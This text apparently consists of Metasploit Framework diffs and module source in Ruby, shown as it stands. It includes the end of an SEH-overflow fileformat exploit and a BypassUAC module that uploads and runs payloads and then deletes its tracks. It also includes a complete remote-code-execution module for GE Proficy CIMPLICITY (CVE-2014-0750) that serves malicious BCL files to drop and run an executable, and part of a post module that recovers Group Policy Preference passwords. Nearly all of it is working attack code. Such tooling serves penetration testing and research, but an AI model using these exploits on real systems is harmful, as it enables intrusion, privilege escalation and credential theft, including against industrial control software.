'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d\xff",
'Space' => 1787,
'DisableNops' => true,
},
'Targets' =>
[
[ 'Windows Universal',
{
'Ret' => 0x10012848, # pop ebx # pop ecx # ret - hskin.dll
'Offset' => 256
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Nov 24 2013',
'DefaultTarget' => 0))
register_options([OptString.new('FILENAME', [ false, 'The file name.', 'Settings.ini']),], self.class)
end
def exploit
buffer = "[Support Groups]\r\nVideo="
buffer << rand_text(target['Offset'])
buffer << generate_seh_payload(target.ret)
buffer << payload.encoded
buffer << "\r\n[AssociateType]\r\nAssociateType =1"
file_create(buffer)
end
end

View File

@ -29,7 +29,10 @@ class Metasploit3 < Msf::Exploit::Local
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' => [ [ 'Windows', {} ] ],
'Targets' => [
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
],
'DefaultTarget' => 0,
'References' => [
[ 'URL', 'http://www.trustedsec.com/december-2010/bypass-windows-uac/' ]
@ -39,54 +42,10 @@ class Metasploit3 < Msf::Exploit::Local
end
def runas_method
payload = generate_payload_exe
payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
tmpdir = expand_path("%TEMP%")
tempexe = tmpdir + "\\" + payload_filename
write_file(tempexe, payload)
print_status("Uploading payload: #{tempexe}")
session.railgun.shell32.ShellExecuteA(nil,"runas",tempexe,nil,nil,5)
print_status("Payload executed")
end
def exploit
fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? or is_system?
#
# Verify use against Vista+
#
winver = sysinfo["OS"]
if winver !~ /Windows Vista|Windows 2008|Windows [78]/
fail_with(Exploit::Failure::NotVulnerable, "#{winver} is not vulnerable.")
end
if is_uac_enabled?
print_status "UAC is Enabled, checking level..."
else
if is_in_admin_group?
fail_with(Exploit::Failure::Unknown, "UAC is disabled and we are in the admin group so something has gone wrong...")
else
fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
end
end
case get_uac_level
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
fail_with(Exploit::Failure::NotVulnerable,
"UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..."
)
when UAC_DEFAULT
print_good "UAC is set to Default"
print_good "BypassUAC can bypass this setting, continuing..."
when UAC_NO_PROMPT
print_warning "UAC set to DoNotPrompt - using ShellExecute 'runas' method instead"
runas_method
return
end
def check_permissions!
# Check if you are an admin
print_status('Checking admin status...')
vprint_status('Checking admin status...')
admin_group = is_in_admin_group?
if admin_group.nil?
@ -103,18 +62,60 @@ class Metasploit3 < Msf::Exploit::Local
if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
fail_with(Exploit::Failure::NoAccess, "Cannot BypassUAC from Low Integrity Level")
end
end
def exploit
validate_environment!
case get_uac_level
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
fail_with(Exploit::Failure::NotVulnerable,
"UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..."
)
when UAC_DEFAULT
print_good "UAC is set to Default"
print_good "BypassUAC can bypass this setting, continuing..."
when UAC_NO_PROMPT
print_warning "UAC set to DoNotPrompt - using ShellExecute 'runas' method instead"
runas_method
return
end
check_permissions!
upload_binaries!
cmd = "#{path_bypass} /c #{path_payload}"
# execute the payload
pid = cmd_exec_get_pid(cmd)
::Timeout.timeout(30) do
until session_created? do
select(nil,nil,nil,1)
end
end
session.sys.process.kill(pid)
# delete the uac bypass payload
file_rm(path_bypass)
file_rm("#{expand_path("%TEMP%")}\\tior.exe")
cmd_exec("cmd.exe", "/c del \"#{expand_path("%TEMP%")}\\w7e*.tmp\"" )
end
def path_bypass
@bypass_path ||= "#{expand_path("%TEMP%")}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.exe"
end
def path_payload
@payload_path ||= "#{expand_path("%TEMP%")}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.exe"
end
def upload_binaries!
print_status("Uploaded the agent to the filesystem....")
#
# Generate payload and random names for upload
#
payload = generate_payload_exe
# randomize the bypass_uac_filename
bypass_uac_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
# randomize the payload exe name
payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
# path to the bypassuac binary
path = ::File.join(Msf::Config.data_directory, "post")
@ -126,36 +127,55 @@ class Metasploit3 < Msf::Exploit::Local
bpexe = ::File.join(path, "bypassuac-x86.exe")
end
tmpdir = expand_path("%TEMP%")
cmd = "#{tmpdir}\\#{bypass_uac_filename} /c #{tmpdir}\\#{payload_filename}"
print_status("Uploading the bypass UAC executable to the filesystem...")
begin
#
# Upload UAC bypass to the filesystem
#
upload_file("#{tmpdir}\\#{bypass_uac_filename}", bpexe)
upload_file("#{path_bypass}", bpexe)
print_status("Meterpreter stager executable #{payload.length} bytes long being uploaded..")
#
# Upload the payload to the filesystem
#
tempexe = tmpdir + "\\" + payload_filename
write_file(tempexe, payload)
write_file(path_payload, payload)
rescue ::Exception => e
print_error("Error uploading file #{bypass_uac_filename}: #{e.class} #{e}")
print_error("Error uploading file #{path_bypass}: #{e.class} #{e}")
return
end
end
print_status("Uploaded the agent to the filesystem....")
def runas_method
payload = generate_payload_exe
payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
tmpdir = expand_path("%TEMP%")
tempexe = tmpdir + "\\" + payload_filename
write_file(tempexe, payload)
print_status("Uploading payload: #{tempexe}")
session.railgun.shell32.ShellExecuteA(nil,"runas",tempexe,nil,nil,5)
print_status("Payload executed")
end
# execute the payload
cmd_exec(cmd)
def validate_environment!
fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? or is_system?
#
# Verify use against Vista+
#
winver = sysinfo["OS"]
# delete the uac bypass payload
delete_file = "#{tmpdir}\\#{bypass_uac_filename}"
unless winver =~ /Windows Vista|Windows 2008|Windows [78]/
fail_with(Exploit::Failure::NotVulnerable, "#{winver} is not vulnerable.")
end
file_rm(delete_file)
if is_uac_enabled?
print_status "UAC is Enabled, checking level..."
else
if is_in_admin_group?
fail_with(Exploit::Failure::Unknown, "UAC is disabled and we are in the admin group so something has gone wrong...")
else
fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
end
end
end
end

View File

@ -0,0 +1,315 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Auxiliary::Report
include Msf::Exploit::EXE
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::HTML
def initialize
super(
'Name' => 'GE Proficy CIMPLICITY gefebt.exe Remote Code Execution',
'Description' => %q{
This module abuses the gefebt.exe component in GE Proficy CIMPLICITY, reachable through the
CIMPLICIY CimWebServer. The vulnerable component allows to execute remote BCL files in
shared resources. An attacker can abuse this behaviour to execute a malicious BCL and
drop an arbitrary EXE. The last one can be executed remotely through the WebView server.
This module has been tested successfully in GE Proficy CIMPLICITY 7.5 with the embedded
CimWebServer. This module starts a WebDAV server to provide the malicious BCL files. When
the target hasn't the WebClient service enabled, an external SMB service is necessary.
},
'Author' => [
'amisto0x07', # Vulnerability discovery
'Z0mb1E', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2014-0750'],
[ 'ZDI', '14-015' ],
[ 'URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-023-01' ]
],
'Stance' => Msf::Exploit::Stance::Aggressive,
'Platform' => 'win',
'Targets' =>
[
[ 'GE Proficy CIMPLICITY 7.5 (embedded CimWebServer)', { } ]
],
'DefaultTarget' => 0,
'Privileged' => true,
'DisclosureDate' => 'Jan 23 2014'
)
register_options(
[
Opt::RPORT(80),
OptString.new('URIPATH', [ true, 'The URI to use (do not change)', '/' ]),
OptPort.new('SRVPORT', [ true, 'The daemon port to listen on (do not change)', 80 ]),
OptString.new('UNCPATH', [ false, 'Override the UNC path to use.' ]),
OptBool.new('ONLYMAKE', [ false, 'Just generate the malicious BCL files for using with an external SMB server.', true ]),
OptString.new('TARGETURI', [true, 'The base path to the CimWeb', '/'])
], self.class)
end
def on_request_uri(cli, request)
case request.method
when 'OPTIONS'
process_options(cli, request)
when 'PROPFIND'
process_propfind(cli, request)
when 'GET'
process_get(cli, request)
else
vprint_status("#{request.method} => 404 (#{request.uri})")
resp = create_response(404, "Not Found")
resp.body = ""
resp['Content-Type'] = 'text/html'
cli.send_response(resp)
end
end
def process_get(cli, request)
if request.uri =~ /#{@basename}(\d)\.bcl/
print_status("GET => Payload")
data = @bcls[$1.to_i]
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
return
end
# Anything else is probably a request for a data file...
vprint_status("GET => DATA (#{request.uri})")
data = rand_text_alpha(8 + rand(10))
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
end
#
# OPTIONS requests sent by the WebDav Mini-Redirector
#
def process_options(cli, request)
vprint_status("OPTIONS #{request.uri}")
headers = {
'MS-Author-Via' => 'DAV',
'DASL' => '<DAV:sql>',
'DAV' => '1, 2',
'Allow' => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',
'Public' => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK',
'Cache-Control' => 'private'
}
resp = create_response(207, "Multi-Status")
headers.each_pair {|k,v| resp[k] = v }
resp.body = ""
resp['Content-Type'] = 'text/xml'
cli.send_response(resp)
end
#
# PROPFIND requests sent by the WebDav Mini-Redirector
#
def process_propfind(cli, request)
path = request.uri
print_status("Received WebDAV PROPFIND request")
body = ''
if (path =~ /\.bcl$/i)
print_status("Sending BCL multistatus for #{path} ...")
body = %Q|<?xml version="1.0"?>
<a:multistatus xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/" xmlns:c="xml:" xmlns:a="DAV:">
<a:response>
</a:response>
</a:multistatus>
|
elsif (path =~ /\/$/) or (not path.sub('/', '').index('/'))
# Response for anything else (generally just /)
print_status("Sending directory multistatus for #{path} ...")
body = %Q|<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:">
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype><D:collection/></lp1:resourcetype>
<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>
<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>
<lp1:getetag>"39e0001-1000-4808c3ec95000"</lp1:getetag>
<D:lockdiscovery/>
<D:getcontenttype>httpd/unix-directory</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
</D:multistatus>
|
else
print_status("Sending 404 for #{path} ...")
send_not_found(cli)
return
end
# send the response
resp = create_response(207, "Multi-Status")
resp.body = body
resp['Content-Type'] = 'text/xml'
cli.send_response(resp)
end
def check
uri = normalize_uri(target_uri.to_s, "CimWeb", "gefebt.exe")
uri << "?"
res = send_request_cgi('uri' => uri)
# res.to_s is used because the CIMPLICITY embedded web server
# doesn't send HTTP compatible responses.
if res and res.code == 200 and res.to_s =~ /Usage.*gefebt\.exe/
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Unknown
end
def exploit
@extensions = "bcl"
@bcls= []
@total_exe = 0
setup_resources
make_bcls
print_status("BCL's available at #{@exploit_unc}#{@share_name}\\#{@basename}{i}.bcl")
unless datastore['UNCPATH'].blank?
@bcls.each_index { |i| file_create("#{@basename}#{i}.bcl", @bcls[i]) }
if datastore['ONLYMAKE']
print_warning("Files created, remember to upload the BCL files to the remote share!")
print_warning("Once ready set ONLYMAKE to false")
else
exploit_bcl
end
return
end
super
end
def setup_resources
if datastore['UNCPATH'].blank?
# Using WebDAV
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
@basename = rand_text_alpha(3)
@share_name = rand_text_alpha(3)
@exploit_unc = "\\\\#{my_host}\\"
@exe_filename = "#{rand_text_alpha(3 + rand(4))}.exe"
unless datastore['SRVPORT'].to_i == 80 && datastore['URIPATH'] == '/'
fail_with(Failure::BadConfig, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')
end
else
# Using external SMB Server
if datastore['UNCPATH'] =~ /(\\\\[^\\]*\\)([^\\]*)\\([^\\]*)\.bcl/
@exploit_unc = $1
@share_name = $2
@basename = $3
# Use an static file name for the EXE since the module doesn't
# deliver the BCL files in this case.
@exe_filename = "ge_pld.exe"
else
fail_with(Failure::BadConfig, 'Bad UNCPATH format, should be \\\\host\\shared_folder\\base_name.blc')
end
end
end
def make_bcls
exe = generate_payload_exe
# Padding to be sure we're aligned to 4 bytes.
exe << "\x00" until exe.length % 4 == 0
longs = exe.unpack("l*")
offset = 0
# gefebt.exe isn't able to handle (on my test environment) long
# arrays bigger than 16000, so we need to split it.
while longs.length > 0
parts = longs.slice!(0, 16000)
@bcls << generate_bcl(parts , offset)
offset += parts.length * 4
end
end
def generate_bcl(slices, offset)
bcl_payload = ""
slices.each_index do |i|
bcl_payload << "s(#{i + 1}) = #{slices[i]}\n"
end
<<-EOF
Option CStrings On
Sub Main()
Open "#{@exe_filename}" For Binary Access Write As #1
Dim s(#{slices.length}) As Long
#{bcl_payload}
For x = 1 To #{slices.length}
t = x - 1
Put #1,t*4+1+#{offset},s(x)
Next x
Close
End Sub
EOF
end
def execute_bcl(i)
print_status("#{peer} - Executing BCL code #{@basename}#{i}.bcl to drop final payload...")
uri = normalize_uri(target_uri.to_s, "CimWeb", "gefebt.exe")
uri << "?#{@exploit_unc}#{@share_name}\\#{@basename}#{i}.bcl"
res = send_request_cgi('uri' => uri)
# We use res.to_s because the embedded CIMPLICITY Web server doesn't
# answer with valid HTTP responses.
if res and res.code == 200 and res.to_s =~ /(^Error.*$)/
print_error("#{peer} - Server answered with error: $1")
fail_with(Failure::Unknown, "#{peer} - Server answered with error")
elsif res and res.code == 200 and res.to_s =~ /No such file or directory/
fail_with(Failure::BadConfig, "#{peer} - The target wasn't able to access the remote BCL file")
elsif res and res.code == 200
print_good("#{peer} - Answer has been successful")
else
fail_with(Failure::Unknown, "#{peer} - Unknown error")
end
end
def exploit_bcl
@bcls.each_index do |i|
execute_bcl(i)
end
print_status("#{peer} - Executing #{@exe_filename}...")
uri = normalize_uri(target_uri.to_s, "CimWeb", @exe_filename)
uri << "?"
# Enough timeout to execute the payload, but don't block the exploit
# until there is an answer.
send_request_cgi({'uri' => uri}, 3)
end
def primer
exploit_bcl
service.stop
end
def file_create(fname, data)
ltype = "exploit.fileformat.#{self.shortname}"
full_path = store_local(ltype, nil, data, fname)
print_good("#{fname} stored at #{full_path}")
end
end

View File

@ -43,6 +43,7 @@ module Metasploit3
def generate_jar(opts={})
jar = Rex::Zip::Jar.new
jar.add_sub("metasploit") if opts[:random]
@class_files.each do |path|
1.upto(path.length - 1) do |idx|
full = path[0,idx].join("/") + "/"

View File

@ -10,6 +10,7 @@ require 'msf/core/auxiliary/report'
class Metasploit3 < Msf::Post
include Msf::Auxiliary::Report
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Registry
@ -22,6 +23,9 @@ class Metasploit3 < Msf::Post
files containing local user accounts and passwords and decrypts them
using Microsofts public AES key.
Cached Group Policy files may be found on end-user devices if the group
policy object is deleted rather than unlinked.
Tested on WinXP SP3 Client and Win2k8 R2 DC.
},
'License' => MSF_LICENSE,
@ -34,10 +38,10 @@ class Metasploit3 < Msf::Post
],
'References' =>
[
['URL', 'http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences'],
['URL', 'http://msdn.microsoft.com/en-us/library/cc232604(v=prot.13)'],
['URL', 'http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html'],
['URL', 'http://blogs.technet.com/grouppolicy/archive/2009/04/22/passwords-in-group-policy-preferences-updated.aspx']
['URL', 'http://blogs.technet.com/grouppolicy/archive/2009/04/22/passwords-in-group-policy-preferences-updated.aspx'],
['URL', 'https://labs.portcullis.co.uk/blog/are-you-considering-using-microsoft-group-policy-preferences-think-again/']
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ]
@ -65,11 +69,30 @@ class Metasploit3 < Msf::Post
fullpaths = []
cached_domain_controller = nil
print_status "Checking locally..."
locals = get_basepaths(client.fs.file.expand_path("%SYSTEMROOT%\\SYSVOL\\sysvol"))
print_status "Checking for group policy history objects..."
# Windows XP environment variable points to the correct folder.
# Windows Vista and upwards points to ProgramData!
all_users = expand_path("%ALLUSERSPROFILE%")
if all_users.include? 'ProgramData'
all_users.gsub!('ProgramData','Users\\All Users')
else
all_users = "#{all_users}\\Application Data"
end
cached = get_basepaths("#{all_users}\\Microsoft\\Group Policy\\History", true)
unless cached.blank?
basepaths << cached
print_good "Cached Group Policy folder found locally"
end
print_status "Checking for SYSVOL locally..."
system_root = expand_path("%SYSTEMROOT%")
locals = get_basepaths("#{system_root}\\SYSVOL\\sysvol")
unless locals.blank?
basepaths << locals
print_good "Group Policy Files found locally"
print_good "SYSVOL Group Policy Files found locally"
end
# If user supplied domains this implicitly cancels the ALL flag.
@ -153,21 +176,29 @@ class Metasploit3 < Msf::Post
end
def get_basepaths(base)
def get_basepaths(base, cached=false)
locals = []
begin
session.fs.dir.foreach(base) do |sub|
next if sub =~ /^(\.|\.\.)$/
# Local GPO are stored in C:\Users\All Users\Microsoft\Group
# Policy\History\{GUID}\Machine\etc without \Policies
if cached
locals << "#{base}\\#{sub}\\"
else
tpath = "#{base}\\#{sub}\\Policies"
begin
session.fs.dir.foreach(tpath) do |sub2|
next if sub =~ /^(\.|\.\.)$/
next if sub2 =~ /^(\.|\.\.)$/
locals << "#{tpath}\\#{sub2}\\"
end
rescue Rex::Post::Meterpreter::RequestError => e
print_error "Could not access #{tpath} : #{e.message}"
end
end
end
rescue Rex::Post::Meterpreter::RequestError => e
print_error "Error accessing #{base} : #{e.message}"
end
@ -177,7 +208,7 @@ class Metasploit3 < Msf::Post
def find_path(path, xml_path)
xml_path = "#{path}#{xml_path}"
begin
return xml_path if client.fs.file.stat(xml_path)
return xml_path if exist? xml_path
rescue Rex::Post::Meterpreter::RequestError => e
# No permissions for this specific file.
return nil
@ -186,10 +217,7 @@ class Metasploit3 < Msf::Post
def gpp_xml_file(path)
begin
groups = client.fs.file.new(path,'r')
until groups.eof
data = groups.read
end
data = read_file(path)
spath = path.split('\\')
retobj = {